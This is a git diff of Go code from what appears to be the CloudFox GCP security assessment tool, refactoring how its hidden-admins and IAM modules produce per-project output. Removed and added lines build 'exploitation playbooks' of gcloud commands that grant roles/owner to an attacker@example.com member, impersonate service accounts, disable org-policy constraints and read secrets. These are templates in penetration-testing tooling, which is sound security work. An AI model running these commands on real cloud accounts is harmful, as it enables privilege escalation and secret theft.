[]string{ m.GetProjectName(np.ProjectID), np.ClusterName, np.Name, - np.MachineType, fmt.Sprintf("%d", np.NodeCount), saDisplay, attackPaths, - scopes, scopeSummary, shared.BoolToYesNo(np.AutoUpgrade), + np.MachineType, fmt.Sprintf("%d", np.NodeCount), + shared.BoolToYesNo(np.AutoUpgrade), shared.BoolToYesNo(np.SecureBoot), shared.BoolToYesNo(np.IntegrityMonitoring), shared.BoolToYesNo(np.Preemptible || np.Spot), + saDisplay, attackPaths, scopes, scopeSummary, }) } diff --git a/gcp/commands/hiddenadmins.go b/gcp/commands/hiddenadmins.go old mode 100644 new mode 100755 index 7c73cf3a..a0fea1b6 --- a/gcp/commands/hiddenadmins.go +++ b/gcp/commands/hiddenadmins.go @@ -90,6 +90,9 @@ type HiddenAdminsModule struct { WrongAdmins []foxmapperservice.WrongAdminFinding FoxMapperCache *gcpinternal.FoxMapperCache + // OrgCache for ancestry lookups + OrgCache *gcpinternal.OrgCache + OrgIDs []string OrgNames map[string]string FolderNames map[string]string @@ -168,6 +171,15 @@ func GetIAMModificationPermissions() []IAMModificationPermission { func (m *HiddenAdminsModule) Execute(ctx context.Context, logger internal.Logger) { logger.InfoM("Analyzing IAM policies to identify hidden admins...", globals.GCP_HIDDEN_ADMINS_MODULE_NAME) + // Load OrgCache for ancestry lookups (needed for per-project filtering) + m.OrgCache = gcpinternal.GetOrgCacheFromContext(ctx) + if m.OrgCache == nil || !m.OrgCache.IsPopulated() { + diskCache, _, err := gcpinternal.LoadOrgCacheFromFile(m.OutputDirectory, m.Account) + if err == nil && diskCache != nil && diskCache.IsPopulated() { + m.OrgCache = diskCache + } + } + // Try to load FoxMapper data for wrongadmin analysis m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) if m.FoxMapperCache == nil || !m.FoxMapperCache.IsPopulated() { @@ -491,394 +503,309 @@ func (m *HiddenAdminsModule) getKnownRolePermissions(role string) []string { } func (m *HiddenAdminsModule) generateLoot() { - m.LootMap["hidden-admins-exploit-commands"] = &internal.LootFile{ - Name: "hidden-admins-exploit-commands", - Contents: "# GCP Hidden Admins - IAM Modification Exploit Commands\n# Generated by CloudFox\n\n", - } - - // Add entity-specific exploit commands - for _, admin := range m.AllAdmins { - m.addAdminToLoot(admin) - } - - // Add playbook - m.generatePlaybook() + // Loot is now generated per-project in writeHierarchicalOutput/writeFlatOutput } -func (m *HiddenAdminsModule) addAdminToLoot(admin HiddenAdmin) { - lootFile := m.LootMap["hidden-admins-exploit-commands"] - if lootFile == nil { - return - } - - scopeInfo := fmt.Sprintf("%s: %s", admin.ScopeType, admin.ScopeName) - if admin.ScopeName == "" { - scopeInfo = fmt.Sprintf("%s: %s", admin.ScopeType, admin.ScopeID) +func (m *HiddenAdminsModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) } - - lootFile.Contents += fmt.Sprintf( - "# Permission: %s\n"+ - "# Principal: %s (%s)\n"+ - "# Scope: %s\n"+ - "# Category: %s\n"+ - "%s\n\n", - admin.Permission, - admin.Principal, admin.PrincipalType, - scopeInfo, - admin.Category, - admin.ExploitCommand, - ) } -func (m *HiddenAdminsModule) generatePlaybook() { - var content strings.Builder - content.WriteString(`# GCP Hidden Admins Exploitation Playbook -# Generated by CloudFox -# -# This playbook provides exploitation techniques for principals with IAM modification capabilities. - -`) - - // Add wrong admins section if FoxMapper data is available - if len(m.WrongAdmins) > 0 { - content.WriteString(m.generateWrongAdminsSection()) +func (m *HiddenAdminsModule) getHeader() []string { + return []string{ + "Scope Type", + "Scope ID", + "Scope Name", + "Principal", + "Principal Type", + "Permission", + "Category", } +} - // Add IAM modification section - content.WriteString(m.generatePlaybookSections()) +func (m *HiddenAdminsModule) adminsToTableBody(admins []HiddenAdmin) [][]string { + var body [][]string + for _, admin := range admins { + scopeName := admin.ScopeName + if scopeName == "" { + scopeName = admin.ScopeID + } - m.LootMap["hidden-admins-playbook"] = &internal.LootFile{ - Name: "hidden-admins-playbook", - Contents: content.String(), + body = append(body, []string{ + admin.ScopeType, + admin.ScopeID, + scopeName, + admin.Principal, + admin.PrincipalType, + admin.Permission, + admin.Category, + }) } + return body } -func (m *HiddenAdminsModule) generateWrongAdminsSection() string { - var sb strings.Builder - - sb.WriteString("## Wrong Admins (FoxMapper Analysis)\n\n") - sb.WriteString("These principals are marked as admin in the IAM graph but don't have explicit admin roles (roles/owner).\n") - sb.WriteString("Instead, they have self-assignment capabilities (can grant themselves roles/owner).\n\n") - sb.WriteString("**Why this matters:** These principals are effectively admin but may not appear in standard admin audits.\n") - sb.WriteString("They can escalate to full admin access at any time by modifying IAM policies.\n\n") +// adminsForProject returns hidden admins filtered for a specific project +// Includes: +// - Project-scoped findings where ScopeID matches this project +// - Org-scoped findings where the org is this project's org +// - Folder-scoped findings where the folder is in this project's ancestry path +// For all of the above, the principal must either be from this project (SA) or be a user/group +func (m *HiddenAdminsModule) adminsForProject(projectID string) []HiddenAdmin { + var filtered []HiddenAdmin - // Group by admin level - orgWrong := []foxmapperservice.WrongAdminFinding{} - folderWrong := []foxmapperservice.WrongAdminFinding{} - projectWrong := []foxmapperservice.WrongAdminFinding{} - - for _, wa := range m.WrongAdmins { - switch wa.AdminLevel { - case "org": - orgWrong = append(orgWrong, wa) - case "folder": - folderWrong = append(folderWrong, wa) - default: - projectWrong = append(projectWrong, wa) - } + // Get ancestry data for this project + var ancestorFolders []string + var projectOrgID string + if m.OrgCache != nil && m.OrgCache.IsPopulated() { + ancestorFolders = m.OrgCache.GetProjectAncestorFolders(projectID) + projectOrgID = m.OrgCache.GetProjectOrgID(projectID) } - if len(orgWrong) > 0 { - sb.WriteString("### CRITICAL: Organization-Level Wrong Admins\n\n") - for _, wa := range orgWrong { - sb.WriteString(fmt.Sprintf("**%s** [%s]\n", wa.Principal, wa.MemberType)) - for _, reason := range wa.Reasons { - sb.WriteString(fmt.Sprintf(" - %s\n", reason)) - } - sb.WriteString("\n```bash\n") - sb.WriteString("# This principal can grant themselves org-level owner:\n") - sb.WriteString(fmt.Sprintf("gcloud organizations add-iam-policy-binding ORG_ID \\\n")) - sb.WriteString(fmt.Sprintf(" --member='%s:%s' \\\n", wa.MemberType, wa.Principal)) - sb.WriteString(" --role='roles/owner'\n") - sb.WriteString("```\n\n") - } + // Build a set of ancestor folder IDs for quick lookup + ancestorFolderSet := make(map[string]bool) + for _, folderID := range ancestorFolders { + ancestorFolderSet[folderID] = true } - if len(folderWrong) > 0 { - sb.WriteString("### HIGH: Folder-Level Wrong Admins\n\n") - for _, wa := range folderWrong { - sb.WriteString(fmt.Sprintf("**%s** [%s]\n", wa.Principal, wa.MemberType)) - for _, reason := range wa.Reasons { - sb.WriteString(fmt.Sprintf(" - %s\n", reason)) - } - sb.WriteString("\n```bash\n") - sb.WriteString("# This principal can grant themselves folder-level owner:\n") - sb.WriteString(fmt.Sprintf("gcloud resource-manager folders add-iam-policy-binding FOLDER_ID \\\n")) - sb.WriteString(fmt.Sprintf(" --member='%s:%s' \\\n", wa.MemberType, wa.Principal)) - sb.WriteString(" --role='roles/owner'\n") - sb.WriteString("```\n\n") + for _, admin := range m.AllAdmins { + // Check if principal is relevant for this project + principalProject := extractProjectFromPrincipal(admin.Principal, m.OrgCache) + principalRelevant := principalProject == projectID || principalProject == "" + + if !principalRelevant { + continue } - } - if len(projectWrong) > 0 { - sb.WriteString("### MEDIUM: Project-Level Wrong Admins\n\n") - for _, wa := range projectWrong { - sb.WriteString(fmt.Sprintf("**%s** [%s]", wa.Principal, wa.MemberType)) - if wa.ProjectID != "" { - sb.WriteString(fmt.Sprintf(" in %s", wa.ProjectID)) + switch admin.ScopeType { + case "project": + // Project-scoped: must match this project + if admin.ScopeID == projectID { + filtered = append(filtered, admin) } - sb.WriteString("\n") - for _, reason := range wa.Reasons { - sb.WriteString(fmt.Sprintf(" - %s\n", reason)) + case "organization": + // Org-scoped: must be this project's org + if projectOrgID != "" && admin.ScopeID == projectOrgID { + filtered = append(filtered, admin) + } else if projectOrgID == "" { + // No org info, include all org findings for users/groups + filtered = append(filtered, admin) } - projectID := wa.ProjectID - if projectID == "" { - projectID = "PROJECT_ID" + case "folder": + // Folder-scoped: must be in this project's ancestry + if len(ancestorFolderSet) > 0 { + if ancestorFolderSet[admin.ScopeID] { + filtered = append(filtered, admin) + } + } else { + // No ancestry info, include all folder findings for users/groups + filtered = append(filtered, admin) } - sb.WriteString("\n```bash\n") - sb.WriteString("# This principal can grant themselves project-level owner:\n") - sb.WriteString(fmt.Sprintf("gcloud projects add-iam-policy-binding %s \\\n", projectID)) - sb.WriteString(fmt.Sprintf(" --member='%s:%s' \\\n", wa.MemberType, wa.Principal)) - sb.WriteString(" --role='roles/owner'\n") - sb.WriteString("```\n\n") + default: + // Resource-level: include if principal is relevant + filtered = append(filtered, admin) } } - sb.WriteString("---\n\n") - return sb.String() + return filtered } -func (m *HiddenAdminsModule) generatePlaybookSections() string { - var sections strings.Builder - - // Group admins by permission category - categories := map[string][]HiddenAdmin{ - "Org IAM": {}, - "Folder IAM": {}, - "Project IAM": {}, - "Custom Roles": {}, - "SA IAM": {}, - "Org Policy": {}, - "Storage IAM": {}, - "BigQuery IAM": {}, - "Pub/Sub IAM": {}, - "Secrets IAM": {}, - "Compute IAM": {}, - "Functions IAM": {}, - "Cloud Run IAM": {}, - "Artifact Registry IAM": {}, - "KMS IAM": {}, - } +// adminsToTableBodyForProject returns table body filtered for a specific project +func (m *HiddenAdminsModule) adminsToTableBodyForProject(projectID string) [][]string { + admins := m.adminsForProject(projectID) + return m.adminsToTableBody(admins) +} - for _, admin := range m.AllAdmins { - if _, ok := categories[admin.Category]; ok { - categories[admin.Category] = append(categories[admin.Category], admin) - } - } +// wrongAdminsForProject returns wrong admins filtered for a specific project +// Includes: +// - Project-level wrong admins where ProjectID matches this project +// - Org-level wrong admins where OrgID matches this project's org +// - Folder-level wrong admins where FolderID is in this project's ancestry +// For all of the above, the principal must either be from this project (SA) or be a user/group +func (m *HiddenAdminsModule) wrongAdminsForProject(projectID string) []foxmapperservice.WrongAdminFinding { + var filtered []foxmapperservice.WrongAdminFinding - // Organization IAM Modification - if len(categories["Org IAM"]) > 0 { - sections.WriteString("## Organization IAM Modification\n\n") - sections.WriteString("Principals with organization-level IAM modification can grant any role to any principal across the entire organization.\n\n") - sections.WriteString("### Principals with this capability:\n") - for _, admin := range categories["Org IAM"] { - sections.WriteString(fmt.Sprintf("- %s (%s) at %s\n", admin.Principal, admin.PrincipalType, admin.ScopeName)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Grant yourself Owner role at org level\n") - sections.WriteString("gcloud organizations add-iam-policy-binding ORG_ID \\\n") - sections.WriteString(" --member='user:attacker@example.com' \\\n") - sections.WriteString(" --role='roles/owner'\n\n") - sections.WriteString("# Or grant more subtle roles for persistence\n") - sections.WriteString("gcloud organizations add-iam-policy-binding ORG_ID \\\n") - sections.WriteString(" --member='user:attacker@example.com' \\\n") - sections.WriteString(" --role='roles/iam.securityAdmin'\n") - sections.WriteString("```\n\n") + // Get ancestry data for this project + var ancestorFolders []string + var projectOrgID string + if m.OrgCache != nil && m.OrgCache.IsPopulated() { + ancestorFolders = m.OrgCache.GetProjectAncestorFolders(projectID) + projectOrgID = m.OrgCache.GetProjectOrgID(projectID) } - // Folder IAM Modification - if len(categories["Folder IAM"]) > 0 { - sections.WriteString("## Folder IAM Modification\n\n") - sections.WriteString("Principals with folder-level IAM modification can grant roles affecting all projects in the folder hierarchy.\n\n") - sections.WriteString("### Principals with this capability:\n") - for _, admin := range categories["Folder IAM"] { - sections.WriteString(fmt.Sprintf("- %s (%s) at folder %s\n", admin.Principal, admin.PrincipalType, admin.ScopeName)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Grant yourself Editor role at folder level (affects all child projects)\n") - sections.WriteString("gcloud resource-manager folders add-iam-policy-binding FOLDER_ID \\\n") - sections.WriteString(" --member='user:attacker@example.com' \\\n") - sections.WriteString(" --role='roles/editor'\n") - sections.WriteString("```\n\n") + // Build a set of ancestor folder IDs for quick lookup + ancestorFolderSet := make(map[string]bool) + for _, folderID := range ancestorFolders { + ancestorFolderSet[folderID] = true } - // Project IAM Modification - if len(categories["Project IAM"]) > 0 { - sections.WriteString("## Project IAM Modification\n\n") - sections.WriteString("Principals with project-level IAM modification can grant any role within the project.\n\n") - sections.WriteString("### Principals with this capability:\n") - for _, admin := range categories["Project IAM"] { - sections.WriteString(fmt.Sprintf("- %s (%s) in project %s\n", admin.Principal, admin.PrincipalType, admin.ScopeName)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Grant yourself Owner role\n") - sections.WriteString("gcloud projects add-iam-policy-binding PROJECT_ID \\\n") - sections.WriteString(" --member='user:attacker@example.com' \\\n") - sections.WriteString(" --role='roles/owner'\n\n") - sections.WriteString("# Grant compute admin for instance access\n") - sections.WriteString("gcloud projects add-iam-policy-binding PROJECT_ID \\\n") - sections.WriteString(" --member='user:attacker@example.com' \\\n") - sections.WriteString(" --role='roles/compute.admin'\n") - sections.WriteString("```\n\n") - } + for _, wa := range m.WrongAdmins { + principalProject := extractProjectFromPrincipal(wa.Principal, m.OrgCache) + principalRelevant := principalProject == projectID || principalProject == "" - // Custom Role Management - if len(categories["Custom Roles"]) > 0 { - sections.WriteString("## Custom Role Management\n\n") - sections.WriteString("Principals who can create or update custom roles can add dangerous permissions to existing roles or create new privileged roles.\n\n") - sections.WriteString("### Principals with this capability:\n") - for _, admin := range categories["Custom Roles"] { - sections.WriteString(fmt.Sprintf("- %s (%s) - %s in %s\n", admin.Principal, admin.PrincipalType, admin.Permission, admin.ScopeName)) + if !principalRelevant { + continue } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Create a custom role with setIamPolicy permission\n") - sections.WriteString("gcloud iam roles create customPrivesc --project=PROJECT_ID \\\n") - sections.WriteString(" --title='Custom Admin' \\\n") - sections.WriteString(" --permissions='resourcemanager.projects.setIamPolicy'\n\n") - sections.WriteString("# Update existing custom role to add dangerous permissions\n") - sections.WriteString("gcloud iam roles update ROLE_ID --project=PROJECT_ID \\\n") - sections.WriteString(" --add-permissions='iam.serviceAccounts.getAccessToken,iam.serviceAccountKeys.create'\n") - sections.WriteString("```\n\n") - } - // Service Account IAM - if len(categories["SA IAM"]) > 0 { - sections.WriteString("## Service Account IAM Modification\n\n") - sections.WriteString("Principals who can modify service account IAM can grant themselves or others the ability to impersonate SAs.\n\n") - sections.WriteString("### Principals with this capability:\n") - for _, admin := range categories["SA IAM"] { - sections.WriteString(fmt.Sprintf("- %s (%s) in %s\n", admin.Principal, admin.PrincipalType, admin.ScopeName)) + switch wa.AdminLevel { + case "project": + // Project-level: include if ProjectID matches this project + if wa.ProjectID == projectID { + filtered = append(filtered, wa) + } + case "org": + // Org-level: must be this project's org + if projectOrgID != "" && wa.OrgID == projectOrgID { + filtered = append(filtered, wa) + } else if projectOrgID == "" { + // No org info available, include all org findings for relevant principals + filtered = append(filtered, wa) + } + case "folder": + // Folder-level: must be in this project's ancestry + if len(ancestorFolderSet) > 0 && wa.FolderID != "" { + if ancestorFolderSet[wa.FolderID] { + filtered = append(filtered, wa) + } + } else if len(ancestorFolderSet) == 0 { + // No ancestry info available, include all folder findings for relevant principals + filtered = append(filtered, wa) + } + default: + // Unknown level, include for relevant principals if ProjectID matches + if wa.ProjectID == projectID || wa.ProjectID == "" { + filtered = append(filtered, wa) + } } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# List service accounts to find targets\n") - sections.WriteString("gcloud iam service-accounts list --project=PROJECT_ID\n\n") - sections.WriteString("# Grant yourself token creator role on a privileged SA\n") - sections.WriteString("gcloud iam service-accounts add-iam-policy-binding \\\n") - sections.WriteString(" SA@PROJECT_ID.iam.gserviceaccount.com \\\n") - sections.WriteString(" --member='user:attacker@example.com' \\\n") - sections.WriteString(" --role='roles/iam.serviceAccountTokenCreator'\n\n") - sections.WriteString("# Then impersonate the SA\n") - sections.WriteString("gcloud auth print-access-token \\\n") - sections.WriteString(" --impersonate-service-account=SA@PROJECT_ID.iam.gserviceaccount.com\n") - sections.WriteString("```\n\n") } - // Org Policy - if len(categories["Org Policy"]) > 0 { - sections.WriteString("## Organization Policy Modification\n\n") - sections.WriteString("Principals who can modify org policies can disable security constraints.\n\n") - sections.WriteString("### Principals with this capability:\n") - for _, admin := range categories["Org Policy"] { - sections.WriteString(fmt.Sprintf("- %s (%s) at %s\n", admin.Principal, admin.PrincipalType, admin.ScopeName)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Disable domain restricted sharing constraint\n") - sections.WriteString("gcloud resource-manager org-policies disable-enforce \\\n") - sections.WriteString(" constraints/iam.allowedPolicyMemberDomains \\\n") - sections.WriteString(" --organization=ORG_ID\n\n") - sections.WriteString("# Disable public access prevention\n") - sections.WriteString("gcloud resource-manager org-policies disable-enforce \\\n") - sections.WriteString(" constraints/storage.publicAccessPrevention \\\n") - sections.WriteString(" --project=PROJECT_ID\n") - sections.WriteString("```\n\n") - } + return filtered +} - // Storage IAM - if len(categories["Storage IAM"]) > 0 { - sections.WriteString("## Storage Bucket IAM Modification\n\n") - sections.WriteString("Principals who can modify bucket IAM can grant themselves access to bucket contents.\n\n") - sections.WriteString("### Principals with this capability:\n") - for _, admin := range categories["Storage IAM"] { - sections.WriteString(fmt.Sprintf("- %s (%s)\n", admin.Principal, admin.PrincipalType)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Grant yourself object viewer on a bucket\n") - sections.WriteString("gsutil iam ch user:attacker@example.com:objectViewer gs://BUCKET_NAME\n\n") - sections.WriteString("# Or grant full admin access\n") - sections.WriteString("gsutil iam ch user:attacker@example.com:objectAdmin gs://BUCKET_NAME\n") - sections.WriteString("```\n\n") - } +// wrongAdminsToTableBodyForProject returns wrong admins table body for a project +func (m *HiddenAdminsModule) wrongAdminsToTableBodyForProject(projectID string) [][]string { + var body [][]string + for _, wa := range m.wrongAdminsForProject(projectID) { + reasonsStr := strings.Join(wa.Reasons, "; ") - // Secrets IAM - if len(categories["Secrets IAM"]) > 0 { - sections.WriteString("## Secret Manager IAM Modification\n\n") - sections.WriteString("Principals who can modify secret IAM can grant themselves access to secret values.\n\n") - sections.WriteString("### Principals with this capability:\n") - for _, admin := range categories["Secrets IAM"] { - sections.WriteString(fmt.Sprintf("- %s (%s)\n", admin.Principal, admin.PrincipalType)) + displayProject := wa.ProjectID + if displayProject == "" { + displayProject = "-" } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Grant yourself secret accessor role\n") - sections.WriteString("gcloud secrets add-iam-policy-binding SECRET_NAME \\\n") - sections.WriteString(" --member='user:attacker@example.com' \\\n") - sections.WriteString(" --role='roles/secretmanager.secretAccessor' \\\n") - sections.WriteString(" --project=PROJECT_ID\n\n") - sections.WriteString("# Then access the secret\n") - sections.WriteString("gcloud secrets versions access latest --secret=SECRET_NAME --project=PROJECT_ID\n") - sections.WriteString("```\n\n") - } - return sections.String() + body = append(body, []string{ + wa.Principal, + wa.MemberType, + wa.AdminLevel, + displayProject, + reasonsStr, + }) + } + return body } -func (m *HiddenAdminsModule) writeOutput(ctx context.Context, logger internal.Logger) { - if m.Hierarchy != nil && !m.FlatOutput { - m.writeHierarchicalOutput(ctx, logger) - } else { - m.writeFlatOutput(ctx, logger) +// generatePlaybookForProject generates a loot file specific to a project +func (m *HiddenAdminsModule) generatePlaybookForProject(projectID string) *internal.LootFile { + admins := m.adminsForProject(projectID) + wrongAdmins := m.wrongAdminsForProject(projectID) + + if len(admins) == 0 && len(wrongAdmins) == 0 { + return nil } -} -func (m *HiddenAdminsModule) getHeader() []string { - return []string{ - "Scope Type", - "Scope ID", - "Scope Name", - "Principal", - "Principal Type", - "Permission", - "Category", + var sb strings.Builder + sb.WriteString("# GCP Hidden Admins Exploitation Playbook\n") + sb.WriteString(fmt.Sprintf("# Project: %s\n", projectID)) + sb.WriteString("# Generated by CloudFox\n\n") + + // Add wrong admins section if available + if len(wrongAdmins) > 0 { + sb.WriteString("## Wrong Admins (FoxMapper Analysis)\n\n") + sb.WriteString("These principals are marked as admin but don't have explicit admin roles.\n\n") + + for _, wa := range wrongAdmins { + sb.WriteString(fmt.Sprintf("### %s [%s]\n", wa.Principal, wa.MemberType)) + sb.WriteString(fmt.Sprintf("Admin Level: %s\n", wa.AdminLevel)) + for _, reason := range wa.Reasons { + sb.WriteString(fmt.Sprintf(" - %s\n", reason)) + } + + // Add exploit command based on admin level + switch wa.AdminLevel { + case "org": + sb.WriteString("\n```bash\n") + sb.WriteString("# Grant yourself org-level owner:\n") + sb.WriteString(fmt.Sprintf("gcloud organizations add-iam-policy-binding ORG_ID --member='%s:%s' --role='roles/owner'\n", wa.MemberType, wa.Principal)) + sb.WriteString("```\n\n") + case "folder": + sb.WriteString("\n```bash\n") + sb.WriteString("# Grant yourself folder-level owner:\n") + sb.WriteString(fmt.Sprintf("gcloud resource-manager folders add-iam-policy-binding FOLDER_ID --member='%s:%s' --role='roles/owner'\n", wa.MemberType, wa.Principal)) + sb.WriteString("```\n\n") + default: + sb.WriteString("\n```bash\n") + sb.WriteString("# Grant yourself project-level owner:\n") + targetProject := wa.ProjectID + if targetProject == "" { + targetProject = projectID + } + sb.WriteString(fmt.Sprintf("gcloud projects add-iam-policy-binding %s --member='%s:%s' --role='roles/owner'\n", targetProject, wa.MemberType, wa.Principal)) + sb.WriteString("```\n\n") + } + } } -} -func (m *HiddenAdminsModule) adminsToTableBody(admins []HiddenAdmin) [][]string { - var body [][]string - for _, admin := range admins { - scopeName := admin.ScopeName - if scopeName == "" { - scopeName = admin.ScopeID + // Add hidden admins section + if len(admins) > 0 { + sb.WriteString("## Hidden Admins (IAM Modification Capabilities)\n\n") + + for _, admin := range admins { + scopeInfo := fmt.Sprintf("%s: %s", admin.ScopeType, admin.ScopeName) + if admin.ScopeName == "" { + scopeInfo = fmt.Sprintf("%s: %s", admin.ScopeType, admin.ScopeID) + } + + sb.WriteString(fmt.Sprintf("### %s [%s]\n", admin.Principal, admin.PrincipalType)) + sb.WriteString(fmt.Sprintf("Permission: %s\n", admin.Permission)) + sb.WriteString(fmt.Sprintf("Category: %s\n", admin.Category)) + sb.WriteString(fmt.Sprintf("Scope: %s\n", scopeInfo)) + sb.WriteString("\n```bash\n") + sb.WriteString(admin.ExploitCommand) + sb.WriteString("\n```\n\n") } + } - body = append(body, []string{ - admin.ScopeType, - admin.ScopeID, - scopeName, - admin.Principal, - admin.PrincipalType, - admin.Permission, - admin.Category, - }) + return &internal.LootFile{ + Name: "hidden-admins-commands", + Contents: sb.String(), } - return body } func (m *HiddenAdminsModule) buildTablesForProject(projectID string) []internal.TableFile { var tableFiles []internal.TableFile - if admins, ok := m.ProjectAdmins[projectID]; ok && len(admins) > 0 { + + // Hidden admins table + body := m.adminsToTableBodyForProject(projectID) + if len(body) > 0 { tableFiles = append(tableFiles, internal.TableFile{ Name: "hidden-admins", Header: m.getHeader(), - Body: m.adminsToTableBody(admins), + Body: body, }) } + + // Wrong admins table + wrongBody := m.wrongAdminsToTableBodyForProject(projectID) + if len(wrongBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "wrong-admins", + Header: m.getWrongAdminsHeader(), + Body: wrongBody, + }) + } + return tableFiles } @@ -920,9 +847,6 @@ func (m *HiddenAdminsModule) wrongAdminsToTableBody() [][]string { for _, wa := range m.WrongAdmins { // Combine reasons into a single string reasonsStr := strings.Join(wa.Reasons, "; ") - if len(reasonsStr) > 100 { - reasonsStr = reasonsStr[:97] + "..." - } projectID := wa.ProjectID if projectID == "" { @@ -940,44 +864,30 @@ func (m *HiddenAdminsModule) wrongAdminsToTableBody() [][]string { return body } -func (m *HiddenAdminsModule) collectLootFiles() []internal.LootFile { - var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { - lootFiles = append(lootFiles, *loot) - } - } - return lootFiles -} func (m *HiddenAdminsModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { outputData := internal.HierarchicalOutputData{ OrgLevelData: make(map[string]internal.CloudfoxOutput), + FolderLevelData: make(map[string]internal.CloudfoxOutput), ProjectLevelData: make(map[string]internal.CloudfoxOutput), } - orgID := "" - if m.Hierarchy != nil && len(m.Hierarchy.Organizations) > 0 { - orgID = m.Hierarchy.Organizations[0].ID - } else if len(m.OrgIDs) > 0 { - orgID = m.OrgIDs[0] - } + // Process each specified project + for _, projectID := range m.ProjectIDs { + // Build tables for this project + tableFiles := m.buildTablesForProject(projectID) - if orgID != "" { - tables := m.buildAllTables() - lootFiles := m.collectLootFiles() - outputData.OrgLevelData[orgID] = HiddenAdminsOutput{Table: tables, Loot: lootFiles} + // Generate loot file for this project + var lootFiles []internal.LootFile + playbook := m.generatePlaybookForProject(projectID) + if playbook != nil { + lootFiles = append(lootFiles, *playbook) + } - for _, projectID := range m.ProjectIDs { - projectTables := m.buildTablesForProject(projectID) - if len(projectTables) > 0 && len(projectTables[0].Body) > 0 { - outputData.ProjectLevelData[projectID] = HiddenAdminsOutput{Table: projectTables, Loot: nil} - } + // Add project to output if there's any data + if len(tableFiles) > 0 || len(lootFiles) > 0 { + outputData.ProjectLevelData[projectID] = HiddenAdminsOutput{Table: tableFiles, Loot: lootFiles} } - } else if len(m.ProjectIDs) > 0 { - tables := m.buildAllTables() - lootFiles := m.collectLootFiles() - outputData.ProjectLevelData[m.ProjectIDs[0]] = HiddenAdminsOutput{Table: tables, Loot: lootFiles} } pathBuilder := m.BuildPathBuilder() @@ -990,30 +900,23 @@ func (m *HiddenAdminsModule) writeHierarchicalOutput(ctx context.Context, logger func (m *HiddenAdminsModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { tables := m.buildAllTables() - lootFiles := m.collectLootFiles() - output := HiddenAdminsOutput{Table: tables, Loot: lootFiles} + // Generate per-project playbooks + var lootFiles []internal.LootFile + for _, projectID := range m.ProjectIDs { + playbook := m.generatePlaybookForProject(projectID) + if playbook != nil { + // Rename to include project for flat output + playbook.Name = fmt.Sprintf("hidden-admins-commands-%s", projectID) + lootFiles = append(lootFiles, *playbook) + } + } - var scopeType string - var scopeIdentifiers []string - var scopeNames []string + output := HiddenAdminsOutput{Table: tables, Loot: lootFiles} - if len(m.OrgIDs) > 0 { - scopeType = "organization" - for _, orgID := range m.OrgIDs { - scopeIdentifiers = append(scopeIdentifiers, orgID) - if name, ok := m.OrgNames[orgID]; ok && name != "" { - scopeNames = append(scopeNames, name) - } else { - scopeNames = append(scopeNames, orgID) - } - } - } else { - scopeType = "project" - scopeIdentifiers = m.ProjectIDs - for _, id := range m.ProjectIDs { - scopeNames = append(scopeNames, m.GetProjectName(id)) - } + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) } err := internal.HandleOutputSmart( @@ -1022,8 +925,8 @@ func (m *HiddenAdminsModule) writeFlatOutput(ctx context.Context, logger interna m.OutputDirectory, m.Verbosity, m.WrapTable, - scopeType, - scopeIdentifiers, + "project", + m.ProjectIDs, scopeNames, m.Account, output, diff --git a/gcp/commands/iam.go b/gcp/commands/iam.go old mode 100644 new mode 100755 index b918e5d9..5a3bfa94 --- a/gcp/commands/iam.go +++ b/gcp/commands/iam.go @@ -90,9 +90,15 @@ type IAMModule struct { CustomRoles []IAMService.CustomRole Groups []IAMService.GroupInfo MFAStatus map[string]*IAMService.MFAStatus - LootMap map[string]*internal.LootFile - FoxMapperCache *gcpinternal.FoxMapperCache - mu sync.Mutex + + // Per-scope loot for inheritance-aware output + OrgLoot map[string]*internal.LootFile // orgID -> loot commands + FolderLoot map[string]*internal.LootFile // folderID -> loot commands + ProjectLoot map[string]*internal.LootFile // projectID -> loot commands + + FoxMapperCache *gcpinternal.FoxMapperCache + OrgCache *gcpinternal.OrgCache + mu sync.Mutex // Member to groups mapping (email -> list of group emails) MemberToGroups map[string][]string @@ -131,7 +137,9 @@ func runGCPIAMCommand(cmd *cobra.Command, args []string) { CustomRoles: []IAMService.CustomRole{}, Groups: []IAMService.GroupInfo{}, MFAStatus: make(map[string]*IAMService.MFAStatus), - LootMap: make(map[string]*internal.LootFile), + OrgLoot: make(map[string]*internal.LootFile), + FolderLoot: make(map[string]*internal.LootFile), + ProjectLoot: make(map[string]*internal.LootFile), MemberToGroups: make(map[string][]string), OrgIDs: []string{}, OrgNames: make(map[string]string), @@ -154,6 +162,9 @@ func (m *IAMModule) Execute(ctx context.Context, logger internal.Logger) { logger.InfoM("Using FoxMapper graph data for attack path analysis", globals.GCP_IAM_MODULE_NAME) } + // Get OrgCache for hierarchy lookups + m.OrgCache = gcpinternal.GetOrgCacheFromContext(ctx) + logger.InfoM("Enumerating IAM across organizations, folders, and projects...", globals.GCP_IAM_MODULE_NAME) // Use the enhanced IAM enumeration @@ -221,39 +232,36 @@ func (m *IAMModule) Execute(ctx context.Context, logger internal.Logger) { // Loot File Management // ------------------------------ func (m *IAMModule) initializeLootFiles() { - m.LootMap["iam-commands"] = &internal.LootFile{ - Name: "iam-commands", - Contents: "# GCP IAM Commands\n# Generated by CloudFox\n\n", - } - m.LootMap["iam-enumeration"] = &internal.LootFile{ - Name: "iam-enumeration", - Contents: "# GCP 